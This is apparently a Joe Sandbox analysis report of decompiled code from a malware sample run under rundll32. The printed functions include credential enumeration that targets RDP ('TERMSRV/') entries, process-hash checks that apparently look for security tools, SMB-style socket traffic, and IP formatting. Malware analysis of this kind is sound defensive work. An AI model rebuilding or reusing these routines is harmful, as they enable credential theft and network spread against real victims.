                                                                                                                                                                                        							_t39 =  *(_t64 + 0x2c);
                                                                                                                                                                                        							if(_t39 >= _t54) {
                                                                                                                                                                                        								goto L15;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								_t41 = _t39 + _t62;
                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						memcpy( *(_t64 + 0x34), _a8 - _t53, _t53);
                                                                                                                                                                                        						 *(_t64 + 0x30) = _t53;
                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						memcpy( *(_t64 + 0x34), _t34 - _t60, _t60);
                                                                                                                                                                                        						 *(_t64 + 0x30) =  *(_t64 + 0x30) & 0x00000000;
                                                                                                                                                                                        						L7:
                                                                                                                                                                                        						_t41 =  *(_t64 + 0x28);
                                                                                                                                                                                        						L14:
                                                                                                                                                                                        						 *(_t64 + 0x2c) = _t41;
                                                                                                                                                                                        						L15:
                                                                                                                                                                                        						return 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t49 =  *((intOrPtr*)(_t57 + 0x20))( *((intOrPtr*)(_t57 + 0x28)), 1 <<  *(_t64 + 0x24), 1);
                                                                                                                                                                                        				_t65 = _t65 + 0xc;
                                                                                                                                                                                        				 *(_t64 + 0x34) = 1;
                                                                                                                                                                                        				if(_t49 != 0) {
                                                                                                                                                                                        					goto L3;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return 1;
                                                                                                                                                                                        			}















                                                                                                                                                                                        0x007bbf8a
                                                                                                                                                                                        0x007bbf1f
                                                                                                                                                                                        0x007bbeed
                                                                                                                                                                                        0x007bbef0
                                                                                                                                                                                        0x007bbef3
                                                                                                                                                                                        0x007bbef8
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: memcpy
                                                                                                                                                                                        • String ID: Oet
                                                                                                                                                                                        • API String ID: 3510742995-3042086936
                                                                                                                                                                                        • Opcode ID: e1cf1fe39b433a2052a203964ec285a26f42559cf684c062b5f863c33271a48a
                                                                                                                                                                                        • Instruction ID: ef56059b7b89fa84409b1d3bc2567c7cf8cc0767dc26e4e6b62abcbcd202d3a7
                                                                                                                                                                                        • Opcode Fuzzy Hash: e1cf1fe39b433a2052a203964ec285a26f42559cf684c062b5f863c33271a48a
                                                                                                                                                                                        • Instruction Fuzzy Hash: E3214BB2610B019FD7609F29CD84A63B7EAFF987147401A2DE88A87E10D371F954CF50
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B501E(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void* _a16, char _a20, void** _a24) {
                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t29 = __ecx;
                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                        				if(E007B2F5A(_a4, _a8, _a12, 0, 0xff, 8, _a16, _a20) != 0) {
                                                                                                                                                                                        					_a20 = 0;
                                                                                                                                                                                        					_a16 = 0;
                                                                                                                                                                                        					if(E007B3071(_t29, _a4, _a8, _a12,  &_a16,  &_a20) != 0) {
                                                                                                                                                                                        						_t25 = _a16;
                                                                                                                                                                                        						if(_a20 == 0x74 &&  *((intOrPtr*)(_t25 + 0x50)) == 0x1c &&  *((intOrPtr*)(_t25 + 0x70)) == 0) {
                                                                                                                                                                                        							_t30 = 5;
                                                                                                                                                                                        							_t25 = memcpy( *_a24, _t25 + 0x5c, _t30 << 2);
                                                                                                                                                                                        							_t28 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t25);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t28;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B2F5A: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000001,00000200,?,?,?,?,?,?,?,?), ref: 007B2F73
                                                                                                                                                                                          • Part of subcall function 007B2F5A: HeapAlloc.KERNEL32(00000000), ref: 007B2F7C
                                                                                                                                                                                          • Part of subcall function 007B2F5A: GetProcessHeap.KERNEL32(00000008,?,7777C2E0), ref: 007B2F97
                                                                                                                                                                                          • Part of subcall function 007B2F5A: HeapAlloc.KERNEL32(00000000), ref: 007B2F9A
                                                                                                                                                                                          • Part of subcall function 007B2F5A: htons.WS2_32(424D53FE), ref: 007B2FBA
                                                                                                                                                                                          • Part of subcall function 007B2F5A: memcpy.MSVCRT ref: 007B300B
                                                                                                                                                                                          • Part of subcall function 007B2F5A: send.WS2_32(?,00000000,?,00000000), ref: 007B301B
                                                                                                                                                                                          • Part of subcall function 007B2F5A: recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B3032
                                                                                                                                                                                          • Part of subcall function 007B2F5A: GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B3048
                                                                                                                                                                                          • Part of subcall function 007B2F5A: HeapFree.KERNEL32(00000000), ref: 007B304F
                                                                                                                                                                                          • Part of subcall function 007B2F5A: GetProcessHeap.KERNEL32(00000008,?), ref: 007B305A
                                                                                                                                                                                          • Part of subcall function 007B2F5A: HeapFree.KERNEL32(00000000), ref: 007B3061
                                                                                                                                                                                          • Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,0000FFFF,74654F20,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F), ref: 007B3089
                                                                                                                                                                                          • Part of subcall function 007B3071: HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3092
                                                                                                                                                                                          • Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,0000003F,74655520,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B30A4
                                                                                                                                                                                          • Part of subcall function 007B3071: HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B30A7
                                                                                                                                                                                          • Part of subcall function 007B3071: htons.WS2_32(0000003B), ref: 007B30BF
                                                                                                                                                                                          • Part of subcall function 007B3071: send.WS2_32(0000002F,00000000,0000003F,00000000), ref: 007B30F7
                                                                                                                                                                                          • Part of subcall function 007B3071: recv.WS2_32(0000002F,0000002F,0000FFFF,00000000), ref: 007B310D
                                                                                                                                                                                          • Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3127
                                                                                                                                                                                          • Part of subcall function 007B3071: HeapAlloc.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B312E
                                                                                                                                                                                          • Part of subcall function 007B3071: memcpy.MSVCRT ref: 007B3144
                                                                                                                                                                                          • Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3153
                                                                                                                                                                                          • Part of subcall function 007B3071: HeapFree.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B315A
                                                                                                                                                                                          • Part of subcall function 007B3071: GetProcessHeap.KERNEL32(00000008,0000002F,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B3165
                                                                                                                                                                                          • Part of subcall function 007B3071: HeapFree.KERNEL32(00000000,?,?,?,007B4F10,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B316C
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,000000FF,00000008,?,00000000,00000000), ref: 007B508E
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,007B52E8,?,?,?,00000000), ref: 007B5095
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFree$htonsmemcpyrecvsend
                                                                                                                                                                                        • String ID: Oet Uet0Xet$t
                                                                                                                                                                                        • API String ID: 2433318192-2047160959
                                                                                                                                                                                        • Opcode ID: afef411dbc42e5eb3adbfb904d854fe34c6c154fe3043fdd53257f7c9a1960f9
                                                                                                                                                                                        • Instruction ID: a49d53a3fabf88dbf6bcdce9780f4937b88cd7ff0ad8bc99a0ac79505933eb70
                                                                                                                                                                                        • Opcode Fuzzy Hash: afef411dbc42e5eb3adbfb904d854fe34c6c154fe3043fdd53257f7c9a1960f9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6211157200060AAFDF11AF90DD85EEB7B29FF153A4F004026FE005A161C73699A6DBE1
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                        			E007B855F() {
                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                        				void* _v560;
                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t14 = _t13 | 0xffffffff;
                                                                                                                                                                                        				_t15 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                        				if(_t15 != _t14) {
                                                                                                                                                                                        					_push( &_v560);
                                                                                                                                                                                        					_v560 = 0x22c;
                                                                                                                                                                                        					_t8 = Process32FirstW(_t15);
                                                                                                                                                                                        					while(_t8 != 0) {
                                                                                                                                                                                        						_t10 = E007B82EE( &_v524);
                                                                                                                                                                                        						if(_t10 == 0x4a241c3e) {
                                                                                                                                                                                        							L10:
                                                                                                                                                                                        							_t14 = _t14 & 0xffffffef;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							if(_t10 == 0x923ca517) {
                                                                                                                                                                                        								L9:
                                                                                                                                                                                        								_t14 = _t14 & 0xffffffbf;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								if(_t10 == 0x966d0415 || _t10 == 0xaa331620) {
                                                                                                                                                                                        									goto L10;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									if(_t10 == 0xc8f10976) {
                                                                                                                                                                                        										goto L9;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										if(_t10 == 0xe2517a14) {
                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											if(_t10 == 0xe5a05a00) {
                                                                                                                                                                                        												goto L9;
                                                                                                                                                                                        											}
                                                                                                                                                                                        										}
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t8 = Process32NextW(_t15,  &_v560);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseHandle(_t15);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007B8571
                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 007B858F
                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 007B85E4
                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007B85EF
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                                        • Opcode ID: 8dcf40cbb0c02e1f5373a46695addcd1779be10a67311ffbc4179ee9d2178861
                                                                                                                                                                                        • Instruction ID: bb4a8d29816c573b01c9be6db7ec4a70f42e35b1a144bbf677eb1271c6259b51
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dcf40cbb0c02e1f5373a46695addcd1779be10a67311ffbc4179ee9d2178861
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6401B976501618AADBB45AAC9C4CFEF765C5F49320F644752ED22D20E0EE2CCD90CB57
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B6B46(char _a4) {
                                                                                                                                                                                        
                                                                                                                                                                                        				_t1 =  &_a4; // 0x7b6722
                                                                                                                                                                                        				return HeapFree(GetProcessHeap(), 0,  *_t1);
                                                                                                                                                                                        			}



                                                                                                                                                                                        0x007b6b49
                                                                                                                                                                                        0x007b6b5c

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,"g{,?,007B6722,?), ref: 007B6B4E
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,007B6722,?), ref: 007B6B55
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                        • String ID: Oet Uet0Xet$"g{
                                                                                                                                                                                        • API String ID: 3859560861-2767412117
                                                                                                                                                                                        • Opcode ID: c0bf09b6bcd8e421efb30b8b4024ef64d516b6999f0c025cb600b028c0a1295b
                                                                                                                                                                                        • Instruction ID: 16159349e340b569ecfa28686d13cd3bc9d700d53e825f26a5bdde3c702e8e8e
                                                                                                                                                                                        • Opcode Fuzzy Hash: c0bf09b6bcd8e421efb30b8b4024ef64d516b6999f0c025cb600b028c0a1295b
                                                                                                                                                                                        • Instruction Fuzzy Hash: A5C09B72044249B7CB101BD1ED0DFD67F1CF754755F008111F70545050D679D410D769
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B6628(void* __ecx, void* __eflags) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				short _v16;
                                                                                                                                                                                        				short _v18;
                                                                                                                                                                                        				short _v20;
                                                                                                                                                                                        				short _v22;
                                                                                                                                                                                        				short _v24;
                                                                                                                                                                                        				short _v26;
                                                                                                                                                                                        				short _v28;
                                                                                                                                                                                        				short _v30;
                                                                                                                                                                                        				short _v32;
                                                                                                                                                                                        				short _v34;
                                                                                                                                                                                        				short _v36;
                                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                                        				short _v2088;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				char _t29;
                                                                                                                                                                                        				short _t31;
                                                                                                                                                                                        				short _t32;
                                                                                                                                                                                        				short _t33;
                                                                                                                                                                                        				short _t34;
                                                                                                                                                                                        				short _t35;
                                                                                                                                                                                        				short _t36;
                                                                                                                                                                                        				short _t37;
                                                                                                                                                                                        				short _t38;
                                                                                                                                                                                        				short _t39;
                                                                                                                                                                                        				short _t40;
                                                                                                                                                                                        				intOrPtr* _t46;
                                                                                                                                                                                        				short _t53;
                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                        				intOrPtr _t57;
                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                        				 *0x7c3b90 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_t29 = E007B686C(__ecx,  &_v8, __eflags, 1);
                                                                                                                                                                                        				_v12 = _t29;
                                                                                                                                                                                        				if(_t29 != 0) {
                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                        						_t31 = 0x20;
                                                                                                                                                                                        						_v36 = _t31;
                                                                                                                                                                                        						_t32 = 0x22;
                                                                                                                                                                                        						_v34 = _t32;
                                                                                                                                                                                        						_t33 = 0x25;
                                                                                                                                                                                        						_v32 = _t33;
                                                                                                                                                                                        						_t34 = 0x77;
                                                                                                                                                                                        						_v30 = _t34;
                                                                                                                                                                                        						_t35 = 0x73;
                                                                                                                                                                                        						_v28 = _t35;
                                                                                                                                                                                        						_t36 = 0x3a;
                                                                                                                                                                                        						_v26 = _t36;
                                                                                                                                                                                        						_t37 = 0x25;
                                                                                                                                                                                        						_v24 = _t37;
                                                                                                                                                                                        						_t38 = 0x77;
                                                                                                                                                                                        						_v22 = _t38;
                                                                                                                                                                                        						_t39 = 0x73;
                                                                                                                                                                                        						_v20 = _t39;
                                                                                                                                                                                        						_t40 = 0x22;
                                                                                                                                                                                        						_v18 = _t40;
                                                                                                                                                                                        						_v16 = 0;
                                                                                                                                                                                        						_t17 = _v8 + 4; // 0x8dc38b00
                                                                                                                                                                                        						wsprintfW( &_v2088,  &_v36,  *_v8,  *_t17);
                                                                                                                                                                                        						_t46 =  &_v2088;
                                                                                                                                                                                        						_t63 = _t63 + 0x10;
                                                                                                                                                                                        						_t56 = _t46 + 2;
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t57 =  *_t46;
                                                                                                                                                                                        							_t46 = _t46 + 2;
                                                                                                                                                                                        						} while (_t57 != 0);
                                                                                                                                                                                        						_t61 = (_t46 - _t56 >> 1) + _t53;
                                                                                                                                                                                        						if(_t61 < 0x1ff5) {
                                                                                                                                                                                        							StrCatW(0x7c3b90,  &_v2088);
                                                                                                                                                                                        							_v40 = _t61;
                                                                                                                                                                                        							if(E007B6893(_t56,  &_v8) != 0) {
                                                                                                                                                                                        								_t53 = _v40;
                                                                                                                                                                                        								continue;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						E007B6B46(_v12);
                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				L8:
                                                                                                                                                                                        				 *0x7c3010 =  *0x7c3010 & 0;
                                                                                                                                                                                        				 *0x7c7b78 = 0;
                                                                                                                                                                                        				return 0;
                                                                                                                                                                                        			}





































Memory Dump Source
• Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
Similarity
• API ID: wsprintf
• String ID: pGdv0Hcv
• API String ID: 2111968516-3560805785
• Opcode ID: e504d2bc522b7b8526bbfdddc3abe80347923b6987e1a5600edb077e7dd9d9bf
• Instruction ID: e29c87bf302419bea3b7f339d636c4598077c75913b80e945967ebd79c7587ed
• Opcode Fuzzy Hash: e504d2bc522b7b8526bbfdddc3abe80347923b6987e1a5600edb077e7dd9d9bf
• Instruction Fuzzy Hash: 1E317036914209AADB00CFE4DD51BEE73B4FF08714F10545AEA04EB2A0E7799F408B99
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 35%
                                                                                                                                                                                        			E007B76F2(intOrPtr _a4) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				char* _t30;
                                                                                                                                                                                        				signed int _t32;
                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                        				signed short* _t41;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        				char* _t45;
                                                                                                                                                                                        				signed short* _t49;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t38 = 0;
                                                                                                                                                                                        				_t30 =  &_v8;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				__imp__CredEnumerateW(0, 0, _t30,  &_v12);
                                                                                                                                                                                        				_v24 = _t30;
                                                                                                                                                                                        				if(_t30 == 0) {
                                                                                                                                                                                        					L19:
                                                                                                                                                                                        					return _v24;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t32 = 0;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				if(_v8 <= 0) {
                                                                                                                                                                                        					L18:
                                                                                                                                                                                        					__imp__CredFree(_v12);
                                                                                                                                                                                        					goto L19;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t33 =  *((intOrPtr*)(_v12 + _t32 * 4));
                                                                                                                                                                                        					_t49 =  *(_t33 + 8);
                                                                                                                                                                                        					if(_t49 == _t38) {
                                                                                                                                                                                        						L14:
                                                                                                                                                                                        						if( *((intOrPtr*)(_t33 + 4)) != 2) {
                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						L15:
                                                                                                                                                                                        						E007B6B95(_t49, 0, _a4);
                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v16 = 8;
                                                                                                                                                                                        					_t45 = L"TERMSRV/";
                                                                                                                                                                                        					_t41 = _t49;
                                                                                                                                                                                        					while( *_t41 ==  *_t45) {
                                                                                                                                                                                        						_t41 =  &(_t41[1]);
                                                                                                                                                                                        						_t45 =  &(_t45[2]);
                                                                                                                                                                                        						_t13 =  &_v16;
                                                                                                                                                                                        						 *_t13 = _v16 - 1;
                                                                                                                                                                                        						if( *_t13 != 0) {
                                                                                                                                                                                        							continue;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t38 = 0;
                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                        						L8:
                                                                                                                                                                                        						if((0 | _t44 == _t38) == _t38) {
                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t49 =  &(_t49[8]);
                                                                                                                                                                                        						if( *((intOrPtr*)(_t33 + 4)) != 1) {
                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if( *((intOrPtr*)(_t33 + 0x30)) != _t38 &&  *((intOrPtr*)(_t33 + 0x1c)) != _t38) {
                                                                                                                                                                                        							E007B69AE( *((intOrPtr*)(_t33 + 0x30)),  *((intOrPtr*)(_t33 + 0x1c)), _t38);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					asm("sbb ecx, ecx");
                                                                                                                                                                                        					_t44 = ( *_t41 & 0xfffe) + 1;
                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        					L16:
                                                                                                                                                                                        					_t32 = _v20 + 1;
                                                                                                                                                                                        					_v20 = _t32;
                                                                                                                                                                                        				} while (_t32 < _v8);
                                                                                                                                                                                        				goto L18;
                                                                                                                                                                                        			}


















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 007B770B
                                                                                                                                                                                        • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 007B77C3
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Cred$EnumerateFree
                                                                                                                                                                                        • String ID: TERMSRV/
                                                                                                                                                                                        • API String ID: 3403564193-3001602198
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                        			E007B9332(void* __eax, CHAR* _a4) {
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                        				__imp__#52(_a4);
                                                                                                                                                                                        				if(__eax != 0) {
                                                                                                                                                                                        					wsprintfA(_a4, "%u.%u.%u.%u",  *( *( *(__eax + 0xc))) & 0x000000ff, ( *( *(__eax + 0xc)))[1] & 0x000000ff,  *(_t10 + 2) & 0x000000ff,  *(_t10 + 3) & 0x000000ff);
                                                                                                                                                                                        					_t16 = 1;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t16;
                                                                                                                                                                                        			}





                                                                                                                                                                                        APIs
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
